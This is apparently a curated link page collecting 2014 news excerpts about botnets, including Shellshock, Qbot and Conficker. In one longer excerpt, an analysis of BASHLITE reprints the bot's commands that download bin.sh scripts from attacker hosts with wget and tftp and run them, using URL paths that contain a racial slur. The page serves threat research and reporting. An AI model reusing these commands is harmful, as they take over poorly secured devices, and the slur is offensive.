Botnets
Scooped by The Historical Cyber Consortium
onto Botnets

Sweet Orange Dropping some Sweet Botnet action - Zscaler Analyst ...

Sweet Orange Dropping some Sweet Botnet action. I recently saw a very thorough blog on a new flavor of the Sweet Orange Exploit Kit and thought I might throw in some additional research I found. So let's start with what we ...

The Rebirth of Dofoil

Dofoil, also known as Smoke Loader, is a modularized botnet that has existed for a few years. Since 2013, we have not received any new variants of this bot and the command-and-control (C&C) servers of its previous variants are no longer accessibl...

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332

A proof of concept exploit for a Windows vulnerability has recently been published by a Chinese researcher and shows that it’s fairly simple to write malicious VBScript code for attacks for unpatched s

Is MS14-066 the Windows Shellshock?

The latest Patch Tuesday from Microsoft (November 11, 2014) includes fixes for some major vulnerabilities, including remote code execution bugs affecting core Windows components and Internet Explorer.
Scooped by The Historical Cyber Consortium from Surfing the Broadband Bit Stream

Report: Criminals use Shellshock against mail servers to build botnet

Targeting message transfer agents (MTAs), mail delivery agents (MDAs), and spam filters, criminals are using Shellshock as a means to create botnets.

Via Chuck Sherwood, Senior Associate, TeleDimensions, Inc

MIS-Asia - Report: Criminals use Shellshock against mail servers to build botnet

MIS Asia offers Information Technology strategy insight for senior IT management - resources to understand and leverage information technology from a business leadership perspective

Malware-Traffic-Analysis.net - 2014-10-28 - Asprox botnet serving free pizza


Semalt Hijacks Hundreds of Thousands of PCs for Massive Botnet

The spam bot is being used to carry out a large-scale, global offensive bent on fooling search algorithms.

Virus Bulletin : Mayhem – a hidden threat for *nix web servers

Andrew Kovalev and colleagues describe ‘Mayhem’ – a new kind of malware for *nix web servers that has the functions of a traditional Windows bot, but which can act under restricted privileges in the system.

Windows XP flaws help Russian 'Qbot' gang build 500,000 PC botnet

But are botnets becoming yesterday's worry?

Researchers say Conficker is all about the money - CNET

Conficker's ties to a large spamming and password-stealing botnet give credence to the speculation that money, and possibly malicious Eastern European hackers, are behind the latest Internet worm infection.
The Historical Cyber Consortium's insight:
From 2009, but..

Botnet Twists the Knife in iCloud Security | Malware | TechNewsWorld

Hot on the heels of hackers stealing celebrities' nude photos from their iCloud accounts and posting them on the Web comes news that iCloud users are being targeted again.

First Shellshock botnet attacks Akamai, US DoD networks

Wopbot on the rampage. (Wopbot launched a distributed denial of service attack against servers hosted by content delivery network Akamai; read http://t.co/53Fk6oILMw)...
Scooped by The Historical Cyber Consortium from SSH infosecuration

Microsoft SSL bug could be worse than Heartbleed, say researchers

Researchers say the SSL flaw in most versions of Microsoft Windows could be worse than Heartbleed and Shellshock.

Via SSH Communications Security

BASHLITE Affects Devices Running on BusyBox

When news of the Shellshock vulnerability broke at the end of September, we spotted several attacks that leveraged it, showing the prevalence and even the evolution of how attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even download KAITEN source code, among others. We have continuously monitored this vulnerability, and in our latest research we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scan the network for devices/machines running on BusyBox and log in using a set of usernames and passwords (see Figure 4 below). Once a connection is established, the bot runs the command to download and run the bin.sh and bin2.sh scripts, gaining control over the BusyBox system. BusyBox is built on top of the Linux kernel and is used by small devices such as routers. Remote attackers can then extend their control over affected devices by deploying other components or malicious software into the system, depending on their motive. This is seen in the following commands (the hex string and line endings were reconstructed from the scraped text, where the backslashes had been stripped):

    cd /tmp
    busybox wget http://6916337115/.niggers/bin.sh
    busybox tftp -r bin.sh -g 696337115
    sh bin.sh
    echo -e '\x62\x69\x6e\x66\x61\x67\x74'\r\n
    cd /tmp/
    busybox wget http://1761025037/.niggers/bin2.sh
    busybox tftp -r bin2.sh -g 1761025037
    sh bin2.sh
    echo -e '\x62\x69\x6e\x66\x61\x67\x74'\r\n

This means that the malware can perform the following actions on the affected devices:

- Change to the temporary folder, where there is generally file write access.
- Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP. There is a ‘fail-safe’ mechanism in the download routine: if the first command does not fetch any file, the bot tries again to connect to the URL and download the file.
- Run the downloaded shell script.
- Perform the previous “fingerprinting” routine to check whether the device runs on BusyBox.

Figure 1. Code snippets of BASHLITE downloading files via BusyBox

The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox only to echo the string 'gayfgt' when the remote malicious user invoked the command SCANNER ON:

Figure 2. Scanner mode 'ON'

Figure 3. Code snippet of ELF_BASHLITE.A where the string ‘gayfgt’ is represented in octal form

This is done to check whether the device runs BusyBox; however, it does not execute any commands (unlike the new samples). BASHLITE attempts to log into the remote systems by using the following default set of usernames and passwords:

Figure 4. Set of usernames and passwords

User Impact and Countermeasures

Devices running on BusyBox can possibly be affected by BASHLITE. As such, a remote attacker can issue commands or download other files onto the devices, thus compromising their security. Since the initial discovery of the Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and the Smart Protection Network, which detect the exploit and all related malware payloads. We strongly advise users to change the default usernames and passwords on these devices and to disable remote shell access where possible. For more information on the Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools.

The following hashes are related to this threat:

ffaa3c714ae82f954089f49828dac795327bf26e
e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4
82e47cdbedeef6812ea84549ffc2f385a03e57de
fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421

With additional insights from Joseph Cepe

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro

What can we learn from the timeline of Sandworm attacks?

Northern Gold criminal gang infected half million PCs worldwide

Proofpoint firm uncovered a malicious campaign run by the Northern Gold criminal group which is targeting online banking users with a botnet of 500,000 PCs.

Hackers Are Using Gmail Drafts to Update Their Malware and Steal Data | WIRED

In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they're sharing their love letters with data-stealing malware buried deep on a victim's computer.

Apple anti-malware update blocks new 'iWorm' Mac botnet | ZDNet

Mac users should be protected from a new malware threat that has infected around 18,000 users across the world.

Linux botnet Mayhem spreads through Shellshock exploits

The botnet targets Web servers that haven't been patched for recent vulnerabilities found in the Bash Linux shell.

Massive Qbot Botnet strikes 500,000 Machines Through WordPress

Massive Qbot Botnet strikes 500,000 Machines Through WordPress. Attackers steal banking credentials and hire out compromised computers to others

Conficker Most Reported Security Threat in 2014 So Far

Conficker Most Reported Security Threat in 2014. F-Secure finds six-year-old worm persists thanks to unpatched systems

Yahoo Wasn’t Shellshocked in Server Attack, CISO Claims

Yahoo Wasn’t Shellshocked in Server Attack, CISO Claims. Web pioneer hit by similar looking bug but no user data affected

[Honeypot Alert] New Bot Malware (BoSSaBoTv2) Attacking Web Servers Discovered - SpiderLabs Anterior

Our web honeypots picked up some interesting attack traffic. The initial web application attack vector (PHP-CGI vulnerability) is not new, the malware payload is.